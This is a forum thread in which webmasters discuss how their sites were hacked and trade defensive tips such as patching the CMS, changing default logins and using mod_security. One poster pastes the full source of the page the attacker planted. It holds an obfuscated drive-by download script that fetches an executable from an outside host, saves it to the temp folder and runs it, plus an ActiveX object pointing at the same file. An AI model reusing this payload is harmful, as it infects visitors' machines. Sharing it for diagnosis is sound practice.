My Site Got Hacked...how is that possible?

[kblessinggr]

If you ever use a CMS for your site, make sure that you get latest version, and to customize it in such a way that logins and such are not completely default.

For example I once had a site hacked years and years ago because someone I sub-hosted was using PHPNuke, there was a vunerability that allowed the person in, and well... it was subpar shared hosting so you know how that goes. (normally secure provided people sharing were up on their game too)... you live and learn.

Half the time they either guess your password, use a known exploit, or for some reason you have an upload folder that allowed them to upload a .php file from which they could run from the folder (turning off execute permission to any upload folder usually fixes this, and even better, moving said folder outside of the web-accessible area).

 

[tvmatt]

The majority of the time, hacked sites are exploited through a CMS with either a default admin password or through a vulnerable script that's part of the CMS. Consider installing the mod_security module for Apache, as that can help prevent vulnerable scripts from getting exploited (that will block queries that include unix command executions). It's not foolproof, but it sure helps.

 

[Onedollaridea]

All my wp-themes have been hacked. They add hidden class with words and url

 

[scorch]

All my wp-themes have been hacked. They add hidden class with words and url

No way to fix it ?

They add hidden themes

how are they adding a hidden class to your site?

 

[swbiz]

Thanks for all your replies. I got so pissed last night so I terminated my account and the domain and created a brand new account on my VPS. I just wanted to get rid of that crap.

The funny thing though is that the only thing I had was a single page sales letter on that domain, no CMS, no blogs or anything like that.

Anyways, a good lesson for me since I used the same password for pretty much all my domains on the VPS.

 

[Choller]

2 of my blogs just got pwned by some guy/crew who calls himself/themselves "Scorpion". Wordpress 2.6 - No idea how they got in. Checked logs, theres really nothing unusual. It's possible they just guessed my admin password. Make backups people!

Wow same shit happened to me last thursday/friday. Somehow they logged into my whm and cleared all my accounts and made one with h4ckd-something.....

I was running 2 smalltime autoblogs on hostingzoom... and the shitty thing is, i'm still waiting for them to put the backup on, couldn't reach anyone the last few days.

 

[swbiz]

I saved the sourcecode of the page the hacker put up on my domain before I terminated the account. Does is give any clues?

</body>
<meta http-equiv="Content-Language" content="en-us">
<script language=JavaScript> /* Generated using sourceLocker v1.0 LITE Edition (svetlin@developer.bg, kirokomara@designer.bg) */m='%3Ctitle%3E%3C/title%3E%0D%0A%20%20%20%20%3Chead%3E%3C/head%3E%0D%0A%0D%0A%20%20%20%20%3Cbody%3E%0D%0A%3C%21--header%20begin--%3E%0D%0A%0D%0A%3C%21--header%20end--%3E%0D%0A%0D%0A%0D%0A%20%20%20%20%3Cscript%20language%3D%22VBScript%22%3E%0D%0A%0D%0A%20%20%20%20on%20error%20resume%20next%0D%0A%0D%0A%20%20%20%20%0D%0A%0D%0A%20%20%20%20%27%20due%20to%20how%20ajax%20works%2C%20the%20file%20MUST%20be%20within%20the%20same%20local%20domain%0D%0A%20%20%20%20dl%20%3D%20%20%22http://h1.ripway.com/al11dmar/mjrm.exe%22%0D%0A%27%20create%20adodbstream%20object%0D%0A%20%20%20%20Set%20df%20%3D%20document.createElement%28%22object%22%29%0D%0A%20%20%20%20df.setAttribute%20%22classid%22%2C%20%22clsid%3ABD96C556-65A3-11D0-983A-00C04FC29E36%22%0D%0A%20%20%20%20str%3D%22Microsoft.XMLHTTP%22%0D%0A%20%20%20%20Set%20x%20%3D%20df.CreateObject%28str%2C%22%22%29%0D%0A%0D%0A%20%20%20%20a1%3D%22Ado%22%0D%0A%20%20%20%20a2%3D%22db.%22%0D%0A%20%20%20%20a3%3D%22Str%22%0D%0A%20%20%20%20a4%3D%22eam%22%0D%0A%20%20%20%20str1%3Da1%26a2%26a3%26a4%0D%0A%20%20%20%20str5%3Dstr1%0D%0A%20%20%20%20set%20S%20%3D%20df.createobject%28str5%2C%22%22%29%0D%0A%20%20%20%20S.type%20%3D%201%0D%0A%0D%0A%20%20%20%20%27%20xml%20ajax%20req%0D%0A%20%20%20%20str6%3D%22GET%22%0D%0A%20%20%20%20x.Open%20str6%2C%20dl%2C%20False%0D%0A%20%20%20%20x.Send%0D%0A%0D%0A%20%20%20%20%27%20Get%20temp%20directory%20and%20create%20our%20destination%20name%0D%0A%20%20%20%20fname1%3D%22bl4ck.com%22%0D%0A%20%20%20%20set%20F%20%3D%20df.createobject%28%22Scripting.FileSystemObject%22%2C%22%22%29%0D%0A%20%20%20%20set%20tmp%20%3D%20F.GetSpecialFolder%282%29%20%27%20Get%20tmp%20folder%0D%0A%20%20%20%20fname1%3D%20F.BuildPath%28tmp%2Cfname1%29%0D%0A%20%20%20%20S.open%0D%0A%20%20%20%20%27%20open%20adodb%20stream%20and%20write%20contents%20of%20request%20to%20file%0D%0A%20%20%20%20%27%20like%20vbs%20dl+exec%20code%0D%0A%20%20%20%20S.write%20x.responseBody%0D%0A%20%20%20%20%27%20Saves%20it%20with%20CreateOverwrite%20flag%0D%0A%20%20%20%20S.savetofile%20fname1%2C2%0D%0A%0D%0A%20%20%20%20S.close%0D%0A%20%20%20%20set%20Q%20%3D%20df.createobject%28%22Shell.Application%22%2C%22%22%29%0D%0A%20%20%20%20Q.ShellExecute%20fname1%2C%22%22%2C%22%22%2C%22open%22%2C0%0D%0A%0D%0A%20%20%20%20%0D%0A%0D%0A%20%20%20%20%3C/script%3E%0D%0A%20%20%20%20%3Chead%3E%0D%0A%20%20%20%20%3Ctitle%3E%5BBL4CK%5D%20%7C%7C%20404%20Not%20Found%3C/title%3E%0D%0A%20%20%20%20%3C/head%3E%3Cbody%3E%0D%0A%20%20%20%20%3Ch1%3E%26nbsp%3B%3C/h1%3E%0D%0A%20%20%20%20%26nbsp%3B%3Cp%3E%0D%0A%20%20%20%20%3C%21--%20%3Cscript%3Elocation.href%3D%27http%3A//google.com%27%3C/script%3E%20--%3E%0D%0A%20%20%20%20%0D%0A%3C%21--footer%20begin--%3E%0D%0A%3Cbr%3E%3Ciframe%20align%3D%22center%22%20src%3D%22http%3A//www.4img.com/up/07/08/10/0c681e1226cb1763f7275f64222eb9c700deceb2.jpg%22%20%20name%3D%22date%22%20id%3D%22date%22%20width%3D%22468%22%20height%3D%2262%22%20marginwidth%3D%220%22%20marginheight%3D%220%22%20scrolling%3D%22no%22%20frameborder%3D%220%22%20%20align%3D%22center%22%20%3E%0D%0A%3C/iframe%3E%3Cbr%3E%3Cbr%3E%0D%0A%3C%21--footer%20end--%3E%0D%0A%09%3C/p%3E%0D%0A%3C/body%3E%0D%0A%0D%0A%20%20%20%20%3C/html%3E';d=unescape(m);document.write(d);</script><!-- --><script type="text/javascript" src="/i.js"></script><script type="text/javascript">if(typeof(urchinTracker)=='function'){_uacct="UA-230305-2";_udn="freewebs.com";urchinTracker();}</script>

<body bgcolor="#000000">

<html>

<body>


<OBJECT id="rboldwn" WIDTH=445 HEIGHT=40 classid="clsid:BADA82CB-BF48-4D76-9611-78E2C6F49F03" codebase="http://imdownloads.rediff.com/newbol/Bol.CAB">
</OBJECT>

<script language="vbscript">
rboldwn.url = "HacKer"4"eVeR http://h1.ripway.com/al11dmar/mjrm.exe"
rboldwn.fontsize = 14
rboldwn.barcolor = EE4E00
rboldwn.start = "start"
</script>

</body>
</html>

 

[Webwonder]

Site hackers are determined pussies that do not get laid.

 

[r3p1v]

That top part is encrypted so it's hard to tell what it does. Near the bottom is a url for mjrm.exe which could be a virus.

 

[53affiliate]

did you have anything else on the site that could have been comprised, it could be your whole hosting account

 

[swbiz]

I have prosper202 on that account but that's about it.